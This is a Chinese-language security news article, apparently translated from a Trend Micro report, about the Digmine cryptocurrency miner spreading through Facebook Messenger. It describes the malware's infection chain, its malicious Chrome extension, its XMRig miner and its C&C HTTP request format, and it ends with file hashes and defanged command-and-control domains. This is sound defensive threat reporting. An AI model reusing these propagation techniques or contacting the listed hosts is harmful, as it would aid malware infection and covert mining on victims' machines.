回归最本质的信息安全

;

新型挖矿工具 Digmine 正在大肆传播,警惕Facebook聊天内容

2017年12月26日发布

141,798
0
1

导语:趋势科技最近又发现一个新型的加密货币挖掘工具 Digmine,它正通过桌面窗口聊天工具Facebook Messenger进行传播。Digmine最初出现在韩国,韩国安全研究员将它命名为“비트코인채굴기bot”,其次在越南,阿塞拜疆,乌克兰,越南,菲律宾,泰

timg.jpg

趋势科技最近又发现一个新型的加密货币挖掘工具 Digmine,它正通过桌面窗口聊天工具Facebook Messenger进行传播。Digmine最初出现在韩国,韩国安全研究员将它命名为“비트코인채굴기bot”,其次在越南,阿塞拜疆,乌克兰,越南,菲律宾,泰国和委内瑞拉等地区纷纷出现。

虽然Facebook Messenger可以在不同平台之间运行,但Digmine仅影响在Chrome上运行的Facebook Messenger。如果Digmine在其他平台(如移动平台)上打开,则将无法正常运行。

Digmine内置了一个门罗币挖矿软件和一个恶意+的Chrome扩展,设法尽可能驻留在用户系统中,以便伺机感染更多的用户设备。

1.jpg

Digmine的攻击链

受害者通常会收到一个名为video_xxxx.zip的文件(其中xxxx是一个四位数字)。该档案隐藏了一个EXE文件。用户不小心运行该文件就会感染Digmine。

Digminer是用AutoIt编写的,除了联系远程命令和控制(C&C)服务器获得指令外,几乎没有其他功能。

伪装成视频的攻击策略

Digmine 在 AutoIt 中编码, 给用户发送假冒视频文件。但实际上该文件是一个 AutoIt 可执行脚本,若用户的 Facebook 帐号设置为自动登录,那么 Digmine 将可以操纵 Facebook Messenger,以便将文件的链接发送给该帐号的好友,达到感染更多用户设备的目的。

2.jpg

通过Facebook Messenger(顶部)发送的Digmine链接以及伪装成视频的文件(底部)

Digmine只是一个下载程序,它将首先连接到C&C服务器以读取其配置并下载多个组件。初始配置包含下载组件的链接,其中大部分也都托管在同一个C&C服务器上。它将下载的组件保存在%appdata% <username>目录中。

3.jpg

下载的配置(顶部)和下载的组件(底部)

Digmine还将执行其他进程,如安装注册表自动启动机制以及系统感染标记。它将搜索并启动Chrome,然后加载从C&C服务器检索到的恶意浏览器扩展。如果Chrome已在运行,则恶意软件将终止并重新启动Chrome,以确保扩展程序已加载。通常情况下,Chrome插件只能从Chrome官方插件库下载及安装。但事实证明,攻击者仍通过使用Chrome命令行参数成功安装了这个恶意插件。

4.jpg

自动启动注册表项中的Digmine下载程序组件(顶部)以及指示恶意软件感染系统的标记(底部)

5.jpg

当前正在运行的Chrome进程被终止(顶部),然后用参数重新加载Chrome来加载扩展(底部)

扩展将从C&C服务器读取它自己的配置,它可以指示扩展程序继续登录到Facebook或打开将播放视频的虚假页面。

经过伪装的视频网站也是C&C结构的一部分,这个网站会伪装成是一个视频媒体网站,但其实它包含了很多恶意软件组件的配置。

6.jpg

伪装的视频网站的配置链接

7.png

浏览器扩展使用的初始配置

Digmine的传播机制

这个Chrome浏览器插件的主要作用是访问受害者的Facebook Messenger配置文件,并向受受害者的所有联系人发送包含video_xxxx.zip文件的消息。

研究人员表示,这种自我传播机制只适用于使用Chrome浏览器登录Facebook Messenger且选择了默认自动登录的受害者。如果受害者仅仅是使用Chrome浏览器登录,但并没有选择默认自动登录,则这种机制是无效的。因为,在这种情况下,它无法进入Facebook Messenger的消息编辑及发送界面。而在默认自动登录的情况下,恶意软件会通过从C&C服务器下载附加代码来完成。

由于可以添加更多的代码,Digmine与Facebook的相互相应可能会在未来出现更多的攻击功能。

8.png

从C&C服务器获取的允许与Facebook交互的附加代码

挖掘组件

研究人员表示,目前,Digmine会从C&C服务器下载两个关键组件:一个门罗币挖矿工具和一个Chrome浏览器插件。同时,Digmine还会添加一个基于注册表的自启机制,并安装这两个组件。

挖矿模块将由挖矿管理组件codec.exe下载,它将被连接到另一台C&C服务器来检索挖矿及其相应的配置文件。

挖矿组件miner.exe是一个被称为XMRig的开源门罗币挖矿工具的迭代,此次的挖矿工具被重新配置为使用config.json文件执行,而不是直接从命令行接收参数。

9.jpg

挖矿配置(顶部)和codec.exe代码启动的挖矿组件(底部)

C&C通信和协议

下载程序和挖掘管理组件都使用特定的HTTP标头进行通信,下载初始配置时,恶意软件在发送到C&C服务器之前会构造HTTP GET请求。

GET /api/apple/config.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Miner
Window: 
<Window name of active window>
ScriptName: 
<filename of malware>
OS: 
<OS version>
Host: 
<C&C>

Facebook正努力阻止Digmine传播

Digmine 挖矿工具被披露后,Facebook 迅速从其平台上删除了许多与 Digmine 相关的链接。 Facebook 在官方声明中表示, 目前 Facebook 维护了许多自动化系统,以帮助阻止有害链接和文件。不过,这仅仅是一种紧急解决措施,攻击者完全可以创建一个新的连接来开展Digmine的分发活动。

Facebook发言人说:

我们对一些自动化系统进行了配置,以帮助我们阻止恶意链接和恶意文件出现在Facebook或者Messenger上。如果我们怀疑某个用户的计算机感染了恶意软件,我们将向用户提供免费的反病毒扫描程序。另外,我们也将在facebook[.]com/help上分享有关如何保持安全的建议,以及这些扫描程序的下载链接。

研究人员建议,为了避免这些类型的威胁,用户需更加警惕社交媒体帐户的使用,比如注意可疑和未经请求的消息、 启用帐户的隐私设置、点击链接或者分享信息时先进行确认。

未来的攻击趋势预测

加密货币的兴盛,也让这里成了攻击者的新战场,从目前的趋势来看,很多攻击者都在传播恶意软件时,顺便挖点矿,实现攻击利益的最大化,我相信这种模式未来会成为流行模式。

IoCs

TROJ_DIGMINEIN.A(SHA256)的哈希:

beb7274d78c63aa44515fe6bbfd324f49ec2cc0b8650aeb2d6c8ab61a0ae9f1d

BREX_DIGMINEEX.A(SHA256)的哈希:

5a5b8551a82c57b683f9bd8ba49aefeab3d7c9d299a2d2cb446816cd15d3b3e9

TROJ_DIGMINE.A(SHA256)的哈希:

f7e0398ae1f5a2f48055cf712b08972a1b6eb14579333bf038d37ed862c55909

与Digmine相关的C&C服务器(包括子域名):

vijus[.]bid

ozivu[.]bid

thisdayfunnyday[.]space

thisaworkstation[.]space

mybigthink[.]space

mokuz[.]bid

pabus[.]bid

yezav[.]bid

bigih[.]bid

taraz[.]bid

megu[.]info

本文翻译自:http://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/ ,如若转载,请注明原文地址: http://www.4hou.com/info/news/9461.html

点赞 1
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

xiaohui

嘶吼编辑

发私信

发表评论